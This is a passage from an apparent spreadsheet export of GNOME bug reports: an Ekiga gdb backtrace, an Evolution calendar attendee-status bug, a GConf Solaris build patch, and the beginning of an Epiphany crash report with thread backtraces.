#46 0xb767c1e3 in signal_emit_unlocked_R (node=0x8157610 detail=0 
    instance=0x85b44b8 emission_return=0xbfcdc82c 
    instance_and_params=0xbfcdc66c) at gsignal.c:2478
#47 0xb767ce7f in IA__g_signal_emit_valist (instance=0x85b44b8 signal_id=48 
    detail=0 var_args=) at gsignal.c:2209
#48 0xb767d279 in IA__g_signal_emit (instance=0x85b44b8 signal_id=48 
    detail=0) at gsignal.c:2243
#49 0xb7c3cf38 in IA__gtk_widget_child_focus (widget=0x85b44b8 
    direction=GTK_DIR_TAB_FORWARD) at gtkwidget.c:5895
#50 0xb7c4fa7d in gtk_window_focus (widget=0x886b810 
    direction=GTK_DIR_TAB_FORWARD) at gtkwindow.c:4938
---Type  to continue or q  to quit---
#51 0xb7b2695e in _gtk_marshal_BOOLEAN__ENUM (closure=0x8156998 
    return_value=0xbfcdca80 n_param_values=2 param_values=0xbfcdcb5c 
    invocation_hint=0xbfcdca6c marshal_data=0xb7c4f9e0) at gtkmarshalers.c:164
#52 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156998 
    return_value=0xbfcdca80 n_param_values=2 param_values=0xbfcdcb5c 
    invocation_hint=0xbfcdca6c marshal_data=0xa8) at gclosure.c:567
#53 0xb766b79b in IA__g_closure_invoke (closure=0x8156998 
    return_value=0xbfcdca80 n_param_values=2 param_values=0xbfcdcb5c 
    invocation_hint=0xbfcdca6c) at gclosure.c:490
#54 0xb767c1e3 in signal_emit_unlocked_R (node=0x8157610 detail=0 
    instance=0x886b810 emission_return=0xbfcdcd1c 
    instance_and_params=0xbfcdcb5c) at gsignal.c:2478
#55 0xb767ce7f in IA__g_signal_emit_valist (instance=0x886b810 signal_id=48 
    detail=0 var_args=) at gsignal.c:2209
#56 0xb767d279 in IA__g_signal_emit (instance=0x886b810 signal_id=48 
    detail=0) at gsignal.c:2243
#57 0xb7c3cf38 in IA__gtk_widget_child_focus (widget=0x886b810 
    direction=GTK_DIR_TAB_FORWARD) at gtkwidget.c:5895
#58 0xb7c4faa9 in gtk_window_move_focus (window=0x886b810 
    dir=GTK_DIR_TAB_FORWARD) at gtkwindow.c:4744
#59 0xb76785b9 in IA__g_cclosure_marshal_VOID__ENUM (closure=0x815bc80 
    return_value=0x0 n_param_values=2 param_values=0xbfcdd05c 
    invocation_hint=0xbfcdcf6c marshal_data=0xb7c4fa90) at gmarshal.c:356
---Type  to continue or q  to quit---
#60 0xb7669fb9 in g_type_class_meta_marshal (closure=0x815bc80 
    return_value=0x0 n_param_values=2 param_values=0xbfcdd05c 
    invocation_hint=0xbfcdcf6c marshal_data=0x1b0) at gclosure.c:567
#61 0xb766b79b in IA__g_closure_invoke (closure=0x815bc80 return_value=0x0 
    n_param_values=2 param_values=0xbfcdd05c invocation_hint=0xbfcdcf6c)
    at gclosure.c:490
#62 0xb767c1e3 in signal_emit_unlocked_R (node=0x815bcf0 detail=0 
    instance=0x886b810 emission_return=0x0 instance_and_params=0xbfcdd05c)
    at gsignal.c:2478
#63 0xb767d0b7 in IA__g_signal_emit_valist (instance=0x886b810 signal_id=102 
    detail=0 var_args=0xbfcdd2ac Ð¶iï¿½ï¿½MÈ·\030e\025\b) at gsignal.c:2199
#64 0xb767fe9e in IA__g_signal_emit_by_name (instance=0x886b810 
    detailed_signal=0xb7c84df6 move_focus) at gsignal.c:2267
#65 0xb7aa3d04 in gtk_dialog_map (widget=0x886b810) at gtkdialog.c:319
#66 0xb7678b29 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8156518 
    return_value=0x0 n_param_values=1 param_values=0xbfcdd52c 
    invocation_hint=0xbfcdd43c marshal_data=0xb7aa3c60) at gmarshal.c:77
#67 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156518 
    return_value=0x0 n_param_values=1 param_values=0xbfcdd52c 
    invocation_hint=0xbfcdd43c marshal_data=0x6c) at gclosure.c:567
#68 0xb766b79b in IA__g_closure_invoke (closure=0x8156518 return_value=0x0 
    n_param_values=1 param_values=0xbfcdd52c invocation_hint=0xbfcdd43c)
    at gclosure.c:490
---Type  to continue or q  to quit---
#69 0xb767c02a in signal_emit_unlocked_R (node=0x8156530 detail=0 
    instance=0x886b810 emission_return=0x0 instance_and_params=0xbfcdd52c)
    at gsignal.c:2370
#70 0xb767d0b7 in IA__g_signal_emit_valist (instance=0x886b810 signal_id=33 
    detail=0 
    var_args=0xbfcdd76c ï¿½\026Ä·\220kÓ·ï¿½`\204\b\bï¿½Í¿^\017Å·\020ï¿½\206\bï¿½ï¿½Í¿ï¿½ï¿½gï¿½ï¿½Xhï¿½\001) at gsignal.c:2199
#71 0xb767d279 in IA__g_signal_emit (instance=0x886b810 signal_id=33 
    detail=0) at gsignal.c:2243
#72 0xb7c41711 in IA__gtk_widget_map (widget=0x886b810) at gtkwidget.c:2415
#73 0xb7c50f5e in gtk_window_show (widget=0x886b810) at gtkwindow.c:4068
#74 0xb7678b29 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8156400 
    return_value=0x0 n_param_values=1 param_values=0xbfcdda6c 
    invocation_hint=0xbfcdd97c marshal_data=0xb7c50f20) at gmarshal.c:77
#75 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156400 
    return_value=0x0 n_param_values=1 param_values=0xbfcdda6c 
    invocation_hint=0xbfcdd97c marshal_data=0x5c) at gclosure.c:567
#76 0xb766b79b in IA__g_closure_invoke (closure=0x8156400 return_value=0x0 
    n_param_values=1 param_values=0xbfcdda6c invocation_hint=0xbfcdd97c)
    at gclosure.c:490
#77 0xb767c02a in signal_emit_unlocked_R (node=0x8156448 detail=0 
    instance=0x886b810 emission_return=0x0 instance_and_params=0xbfcdda6c)
    at gsignal.c:2370
---Type  to continue or q  to quit---
#78 0xb767d0b7 in IA__g_signal_emit_valist (instance=0x886b810 signal_id=31 
    detail=0 
    var_args=0xbfcddcac \220kÓ·\220kÓ·\020ï¿½\206\bï¿½ï¿½Í¿ï¿½ï¿½Ä·\020ï¿½\206\bï¿½C\025\b\030ï¿½Í¿^\220Ä·\034ï¿½iï¿½ \210gï¿½) at gsignal.c:2199
#79 0xb767d279 in IA__g_signal_emit (instance=0x886b810 signal_id=31 
    detail=0) at gsignal.c:2243
#80 0xb7c40b18 in IA__gtk_widget_show (widget=0x886b810) at gtkwidget.c:2222
#81 0xb7c4a1ef in IA__gtk_window_present_with_time (window=0x886b810 
    timestamp=0) at gtkwindow.c:6248
#82 0xb7c4a259 in IA__gtk_window_present (window=dwarf2_read_address: Corrupted DWARF expression.
) at gtkwindow.c:6200
#83 0x080c0dd7 in gnomemeeting_threads_dialog_show_all (dialog=0x886b810)
    at gmdialog.c:280
#84 0x080c0f9a in gnomemeeting_dialog (parent=0x86bd868 
    prim_text= format= 
    args=0xbfcde19c ï¿½\217&gt;ï¿½ï¿½\021Cï¿½ï¿½\034Xï¿½ï¿½ï¿½Í¿ï¿½\232&lt;ï¿½\200\aH\b 
    type=GTK_MESSAGE_ERROR) at gmdialog.c:557
#85 0x080c1065 in gnomemeeting_error_dialog (parent=0x86bd868 
    primary_text=0xb58e7c53 Fel format=0x8480780 Invalid array index)
    at gmdialog.c:323
#86 0x080900fe in assert_error_msg (data=0x8480780) at gui/misc.cpp:116
#87 0xb73c9aa1 in g_idle_dispatch (source=0x8880d00 
    callback=0xb6464ff4  user_data=0x8480780) at gmain.c:3926
#88 0xb73cb802 in IA__g_main_context_dispatch (context=0x8133a50)
---Type  to continue or q  to quit---
    at gmain.c:2045
#89 0xb73ce7df in g_main_context_iterate (context=0x8133a50 block=1 
    dispatch=1 self=0x810da68) at gmain.c:2677
#90 0xb73ceb89 in IA__g_main_loop_run (loop=0x861d6c8) at gmain.c:2881
#91 0xb7b21574 in IA__gtk_main () at gtkmain.c:1024
#92 0x0808c747 in main (argc=141479176 argv=0x1 envp=Cannot access memory at address 0x8
) at gui/main.cpp:4658
#93 0xb634a8cc in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#94 0x08067311 in _start () at /usr/include/ptclib/http.h:494
#0  0xffffe410 in __kernel_vsyscall ()
(gdb) The program is running.  Exit anyway? (y or n) y
Other information:
Running Ubuntu Edgy (6.10). (Using as many dbgsym packages as want to install.)
Using Ekiga 2.0.3.</t>
  </si>
  <si>
    <t>demitar</t>
  </si>
  <si>
    <t>EVOLUTION-262415</t>
  </si>
  <si>
    <t>After creating meeting with some attendee and if i restart the evolution then attendee status getting shown as accepted</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I created a meeting with some attendees.now  the attendee status is needs
action . But if i restart evolution then attendee status is getting shown
as accepted.
Steps to reproduce the problem:
1. go to evolution calendar
2. go to meeting
3. add an attendee
(now attendee status is needs action)
4.exit the evolution
5.start the evolution and open the meeting that is created
6.see the attendee status
Actual Results:
It is getting shown as accepted
Expected Results:
The status should change depending upon what action attendee choose
How often does this happen? 
Every time
Additional Information:
The build i am using
evolution1.5-1.5.92.0.200408031631-0.snap.ximian.8.1
evolution-data-server-0.0.97.0.200408031631-0.snap.ximian.8.1
 I made RSVP as yes while sending meeting invitation</t>
  </si>
  <si>
    <t>GCONF-56408</t>
  </si>
  <si>
    <t>GConf does not build on Solaris-2.5.1</t>
  </si>
  <si>
    <t>Hi
GConf does not build on Solaris-2.5.1 due to the following reasons:
* snprintf is not available on Sol-2.5.1
* uint32_t is not available on Sol-2.5.1
configure already tests for glib version so an obvious
solution to 1 would be to use g_snprintf aka g_vsnprintf.
uint32_t can be defined using autoconf.
The diffs below modify GConf-1.0.1 i tried to keep compatibility
with other environments as much as possible and to break nothing.
Another bug is that GConf cannot be make install -ed several
times. make install complains about a symlink already existing
when started the second time.
Here the diffs:
diff -ur GConf-1.0.1/acconfig.h GConf-1.0.1-patch/acconfig.h
--- GConf-1.0.1/acconfig.h	Mon Sep 11 23:58:45 2000
+++ GConf-1.0.1-patch/acconfig.h	Tue Jun 19 17:51:41 2001
@@ -73 +722 @@
 #undef ENABLE_NLS
 #undef HAVE_PTHREAD_H
 #undef GETTEXT_PACKAGE
+
+/* types substituted/commented-out by configure */
+#undef uint8_t
+#undef uint16_t
+#undef uint32_t
+
+/**************************************************************
+ * BEGIN AUTOHEADER-GENERATED SECTION
+ **************************************************************/
+@TOP@
+@BOTTOM@
+/**************************************************************
+ * END AUTOHEADER-GENERATED SECTION
+ **************************************************************/
+
+#ifndef HAVE_SNPRINTF
+#define snprintf       g_snprintf
+#endif
+
diff -ur GConf-1.0.1/backends/bdb-backend.c
GConf-1.0.1-patch/backends/bdb-backend.c
--- GConf-1.0.1/backends/bdb-backend.c	Fri Nov  3 07:50:59 2000
+++ GConf-1.0.1-patch/backends/bdb-backend.c	Tue Jun 19 17:57:47 2001
@@ -206 +208 @@
  * Boston MA 02111-1307 USA.
  */
+#include config.h
+
 #include 
 #include 
 #include 
Only in GConf-1.0.1-patch/backends: bdb.C
diff -ur GConf-1.0.1/backends/bdb.c GConf-1.0.1-patch/backends/bdb.c
--- GConf-1.0.1/backends/bdb.c	Fri Oct  6 19:26:24 2000
+++ GConf-1.0.1-patch/backends/bdb.c	Tue Jun 19 17:49:29 2001
@@ -206 +208 @@
  * Boston MA 02111-1307 USA.
  */
+#include config.h
+
 #include 
 #include 
 #include 
diff -ur GConf-1.0.1/config.h.in GConf-1.0.1-patch/config.h.in
--- GConf-1.0.1/config.h.in	Mon Feb  5 22:02:37 2001
+++ GConf-1.0.1-patch/config.h.in	Tue Jun 19 17:52:06 2001
@@ -14 +122 @@
 /* config.h.in.  Generated automatically from configure.in by autoheader. 
*/
+#undef PACKAGE
+#undef VERSION
+#undef HAVE_CATGETS
+#undef HAVE_GETTEXT
+#undef HAVE_LC_MESSAGES
+#undef HAVE_STPCPY
+#undef ENABLE_NLS
+#undef HAVE_PTHREAD_H
+#undef GETTEXT_PACKAGE
+
+/* types substituted/commented-out by configure */
+#undef uint8_t
+#undef uint16_t
+#undef uint32_t
+
+/**************************************************************
+ * BEGIN AUTOHEADER-GENERATED SECTION
+ **************************************************************/
 /* Define if using alloca.c.  */
 #undef C_ALLOCA
@@ -4316 +616 @@
 /* Define if you have the ANSI C header files.  */
 #undef STDC_HEADERS
-#undef PACKAGE
-#undef VERSION
-#undef HAVE_CATGETS
-#undef HAVE_GETTEXT
-#undef HAVE_LC_MESSAGES
-#undef HAVE_STPCPY
-#undef ENABLE_NLS
-#undef HAVE_PTHREAD_H
-#undef GETTEXT_PACKAGE
-
 /* Define if you have the __argz_count function.  */
 #undef HAVE___ARGZ_COUNT
@@ -1364 +14412 @@
 /* Version number of package */
 #undef VERSION
+
+/**************************************************************
+ * END AUTOHEADER-GENERATED SECTION
+ **************************************************************/
+
+#ifndef HAVE_SNPRINTF
+#define snprintf       g_snprintf
+#endif
diff -ur GConf-1.0.1/configure.in GConf-1.0.1-patch/configure.in
--- GConf-1.0.1/configure.in	Fri May 11 16:52:26 2001
+++ GConf-1.0.1-patch/configure.in	Tue Jun 19 17:51:57 2001
@@ -166 +1611 @@
 AC_ARG_PROGRAM
 AM_PROG_LIBTOOL
+dnl Workaround the lack of these typedefs
+AC_CHECK_TYPE(uint8_t unsigned char)
+AC_CHECK_TYPE(uint16_t unsigned short)
+AC_CHECK_TYPE(uint32_t unsigned int)
+
 changequote()dnl
 if test x$GCC = xyes then
   case  $CFLAGS  in
@@ -2166 +2218 @@
 AC_CHECK_FUNCS(usleep)
 AC_CHECK_FUNCS(flockfile)
+
+AC_CHECK_FUNC(snprintf AC_DEFINE(HAVE_SNPRINTF))
 fi # docs_only</t>
  </si>
  <si>
    <t>af</t>
  </si>
  <si>
    <t>EPIPHANY-135976</t>
  </si>
  <si>
    <t>crashed when doing something weird with javascript</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: epiphany
Severity: critical
Version: GNOME2.5.90 1.1.7
Gnome-Distributor: GNOME.Org
Synopsis: crashed when doing something weird with javascript
Bugzilla-Product: epiphany
Bugzilla-Component: General
Bugzilla-Version: 1.1.7
BugBuddy-GnomeVersion: 2.0 (2.5.90)
Description:
Description of the crash:
I was filling out a dialog with custom (probably javascript-based)
submit buttons and got a crash. Unfortunately it's on an internal
website for Novell so (1) I can't give it the password away to anyone
and (2) novell employees are going to see this left and right. I'm going
to ask Chris to look into it if we can duplicate.
Steps to reproduce the crash:
0. fill in data on popup window (adding a blog to a personal data
store)
1. hit 'submit' button on popup window which apparently triggers window
close
2. hit 'cancel' on the 'there is unsubmitted data' dialog
3. try to submit again possbly hit 'Ok' on the 'there is unsubmitted
data' dialog
4. crash
Additional Information:
This was with a build of mozilla 1.6 and ephy from last night.
Debugging Information:
Backtrace was generated from '/home/louie/jhbuilt/bin/epiphany-bin'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1084710784 (LWP 7130)]
[New Thread 110971824 (LWP 7209)]
[New Thread 84994992 (LWP 7200)]
[New Thread 1083411376 (LWP 7187)]
[New Thread 64064432 (LWP 7134)]
[New Thread 37833648 (LWP 7133)]
0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x0034db2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0x001dd8e4 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
#3  0x00e2d61c in nsProfileLock::FatalSignalHandler(int) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libgtkembedmoz.so
#4  
#5  0x03099936 in nsHTMLInputElement::SetFocus(nsIPresContext*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#6  0x0305401d in nsEventStateManager::ChangeFocus(nsIContent* int) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#7  0x0305262e in nsEventStateManager::PostHandleEvent(nsIPresContext*
nsEvent* nsIFrame* nsEventStatus* nsIView*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#8  0x02eec705 in PresShell::HandleEventInternal(nsEvent* nsIView*
unsigned nsEventStatus*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#9  0x02eec26a in PresShell::HandleEvent(nsIView* nsGUIEvent*
nsEventStatus* int int&amp;) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#10 0x0318e9f5 in nsViewManager::HandleEvent(nsView* nsGUIEvent* int)
()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#11 0x031876b2 in nsView::HandleEvent(nsViewManager* nsGUIEvent* int)
()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#12 0x0318e0a6 in nsViewManager::DispatchEvent(nsGUIEvent*
nsEventStatus*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#13 0x03186f32 in HandleEvent(nsGUIEvent*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
#14 0x00ee5b90 in nsCommonWidget::DispatchEvent(nsGUIEvent*
nsEventStatus&amp;) ()
   from
/home/louie/jhbuilt//lib/mozilla-1.6/components/libwidget_gtk2.so
#15 0x00ede6ef in nsWindow::OnButtonPressEvent(_GtkWidget*
_GdkEventButton*)
    () from
/home/louie/jhbuilt//lib/mozilla-1.6/components/libwidget_gtk2.so
#16 0x00ee22f8 in button_press_event_cb(_GtkWidget* _GdkEventButton*)
()
   from
/home/louie/jhbuilt//lib/mozilla-1.6/components/libwidget_gtk2.so
#17 0x010cebd0 in _gtk_marshal_BOOLEAN__BOXED (closure=0xbfe61814 
    return_value=0xbfe616d0 n_param_values=2 param_values=0xbfe61800
    invocation_hint=0xbfe616f8 marshal_data=0x0) at gtkmarshalers.c:82
#18 0x00491dde in g_closure_invoke (closure=0xa7a3f50 
    return_value=0xbfe616d0 n_param_values=2 param_values=0xbfe61800
    invocation_hint=0xbfe616f8) at gclosure.c:437
#19 0x004a3af6 in signal_emit_unlocked_R (node=0x9a4a708 detail=0 
    instance=0xa64bfe8 emission_return=0xbfe617a0 
    instance_and_params=0xbfe61800) at gsignal.c:2436
#20 0x004a2a29 in g_signal_emit_valist (instance=0xa64bfe8 signal_id=0
    detail=0 var_args=0xbfe61990
Ã‚Â¨\031ÃƒÂ¦Ã‚Â¿@ÃƒÂ—Ã‚Â¢\tÃ‚Â¸\031ÃƒÂ¦Ã‚Â¿\221)\e\001Ã‚Â¨\031ÃƒÂ¦Ã‚Â¿)
    at gsignal.c:2205
#21 0x004a2eb3 in g_signal_emit (instance=0xa64bfe8 signal_id=53
detail=0)
    at gsignal.c:2239
#22 0x011b2cd0 in gtk_widget_event_internal (widget=0xa64bfe8
event=0xa0cdd08)
    at gtkwidget.c:3562
#23 0x010cd287 in gtk_propagate_event (widget=0xa64bfe8
event=0xa0cdd08)
    at gtkmain.c:2349
#24 0x010cc1c3 in gtk_main_do_event (event=0xa0cdd08) at gtkmain.c:1581
#25 0x003c74ce in gdk_event_dispatch (source=0x0 callback=0
user_data=0x0)
    at gdkevents-x11.c:2136
#26 0x00aa4470 in g_main_dispatch (context=0x9a47c18) at gmain.c:1904
#27 0x00aa5435 in g_main_context_dispatch (context=0x9a47c18) at
gmain.c:2450
#28 0x00aa575a in g_main_context_iterate (context=0x9a47c18 block=1 
    dispatch=1 self=0x9a2b600) at gmain.c:2531
#29 0x00aa5df2 in g_main_loop_run (loop=0x9a70470) at gmain.c:2751
#30 0x010cbb37 in gtk_main () at gtkmain.c:1171
#31 0x08071af2 in main (argc=1 argv=0xbfe61c44) at ephy-main.c:190
Thread 6 (Thread 37833648 (LWP 7133)):
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x06ba96f7 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#2  0x0037c1fb in _pr_poll_with_poll ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#3  0x051e2527 in nsSocketTransportService::Poll() ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libnecko.so
No symbol table info available.
#4  0x051e2b19 in nsSocketTransportService::Run() ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libnecko.so
No symbol table info available.
#5  0x00762a5a in nsThread::Main(void*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libxpcom.so
No symbol table info available.
#6  0x0037d549 in _pt_root ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#7  0x003477fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x06bb2aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread 64064432 (LWP 7134)):
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0034a5e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00378913 in pt_TimedWait ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#3  0x00378ad5 in PR_WaitCondVar ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#4  0x00765752 in TimerThread::Run() ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libxpcom.so
No symbol table info available.
#5  0x00762a5a in nsThread::Main(void*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libxpcom.so
No symbol table info available.
#6  0x0037d549 in _pt_root ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#7  0x003477fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x06bb2aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread 1083411376 (LWP 7187)):
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0034a5e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00378913 in pt_TimedWait ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#3  0x00378ad5 in PR_WaitCondVar ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#4  0x051c613e in nsIOThreadPool::ThreadFunc(void*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libnecko.so
No symbol table info available.
#5  0x0037d549 in _pt_root ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#6  0x003477fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x06bb2aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 84994992 (LWP 7200)):
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0034a5e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00378913 in pt_TimedWait ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#3  0x00378ad5 in PR_WaitCondVar ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#4  0x051c613e in nsIOThreadPool::ThreadFunc(void*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libnecko.so
No symbol table info available.
#5  0x0037d549 in _pt_root ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#6  0x003477fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x06bb2aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 110971824 (LWP 7209)):
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0034a5e0 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x00378913 in pt_TimedWait ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#3  0x00378ad5 in PR_WaitCondVar ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#4  0x051edb52 in nsHostResolver::GetHostToLookup(nsHostRecord**) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libnecko.so
No symbol table info available.
#5  0x051ede40 in nsHostResolver::ThreadFunc(void*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libnecko.so
No symbol table info available.
#6  0x0037d549 in _pt_root ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libnspr4.so
No symbol table info available.
#7  0x003477fc in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x06bb2aba in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1084710784 (LWP 7130)):
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0034db2b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x001dd8e4 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
	estatus = 0
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {112492529 242920038 2929928 3210371072 0 
      3219524732 2892542 3210371484 3210264608 1 0 3210371072
14777960 
      3219524764 2892443 3210371484 14880784 573 14801188
113300024 
      113302432 162635864 3219524756 112488475 113302432 162635864
      14879912 162172320 173517472 3219524788 14868014 162635864}}
  sa_flags = 2892912 sa_restorer = 0}
	pid = 0
#3  0x00e2d61c in nsProfileLock::FatalSignalHandler(int) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/libgtkembedmoz.so
No symbol table info available.
#4  
No symbol table info available.
#5  0x03099936 in nsHTMLInputElement::SetFocus(nsIPresContext*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#6  0x0305401d in nsEventStateManager::ChangeFocus(nsIContent* int) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#7  0x0305262e in nsEventStateManager::PostHandleEvent(nsIPresContext*
nsEvent* nsIFrame* nsEventStatus* nsIView*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#8  0x02eec705 in PresShell::HandleEventInternal(nsEvent* nsIView*
unsigned nsEventStatus*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#9  0x02eec26a in PresShell::HandleEvent(nsIView* nsGUIEvent*
nsEventStatus* int int&amp;) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#10 0x0318e9f5 in nsViewManager::HandleEvent(nsView* nsGUIEvent* int)
()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#11 0x031876b2 in nsView::HandleEvent(nsViewManager* nsGUIEvent* int)
()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#12 0x0318e0a6 in nsViewManager::DispatchEvent(nsGUIEvent*
nsEventStatus*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#13 0x03186f32 in HandleEvent(nsGUIEvent*) ()
   from /home/louie/jhbuilt//lib/mozilla-1.6/components/libgklayout.so
No symbol table info available.
#14 0x00ee5b90 in nsCommonWidget::DispatchEvent(nsGUIEvent*
nsEventStatus&amp;) ()
   from
/home/louie/jhbuilt//lib/mozilla-1.6/components/libwidget_gtk2.so
No symbol table info available.
#15 0x00ede6ef in nsWindow::OnButtonPressEvent(_GtkWidget*
_GdkEventButton*)
    () from
/home/louie/jhbuilt//lib/mozilla-1.6/components/libwidget_gtk2.so
No symbol table info available.
#16 0x00ee22f8 in button_press_event_cb(_GtkWidget* _GdkEventButton*)
()
   from
/home/louie/jhbuilt//lib/mozilla-1.6/components/libwidget_gtk2.so
No symbol table info available.
#17 0x010cebd0 in _gtk_marshal_BOOLEAN__BOXED (closure=0xbfe61814 
    return_value=0xbfe616d0 n_param_values=2 param_values=0xbfe61800
    invocation_hint=0xbfe616f8 marshal_data=0x0) at gtkmarshalers.c:82
	callback = 0xee22a0 &lt;button_press_event_cb(_GtkWidget*
_GdkEventButton*)&gt;
	data1 = 0xa64bfe8
	data2 = 0x0
	v_return = 0
#18 0x00491dde in g_closure_invoke (closure=0xa7a3f50 
    return_value=0xbfe616d0 n_param_values=2 param_values=0xbfe61800
    invocation_hint=0xbfe616f8) at gclosure.c:437
	marshal = 0x10ceb34 
	marshal_data = 0x0
	in_marshal = 0
#19 0x004a3af6 in signal_emit_unlocked_R (node=0x9a4a708 detail=0 
    instance=0xa64bfe8 emission_return=0xbfe617a0 
    instance_and_params=0xbfe61800) at gsignal.c:2436
	tmp = (Handler *) 0xbfe616f8
	handler = (Handler *) 0xaccb188
	accumulator = (SignalAccumulator *) 0x9b385e8
	emission = {next = 0x0 instance = 0xa64bfe8 ihint = {signal_id = 53
    detail = 0 run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN 
  chain_type = 4}
	handler_list = (Handler *) 0xaccb188
	return_accu = (GValue *) 0xbfe616d0
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
